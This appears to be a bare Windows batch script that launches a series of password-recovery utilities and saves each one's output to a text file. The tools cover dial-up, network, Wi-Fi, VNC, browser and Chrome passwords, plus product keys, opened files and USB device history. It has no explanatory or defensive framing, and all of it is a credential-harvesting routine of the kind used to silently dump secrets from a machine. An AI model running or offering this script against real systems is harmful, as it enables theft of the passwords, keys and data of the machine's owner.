start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stexth netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start ChromePass.exe /stext ChromePass.txt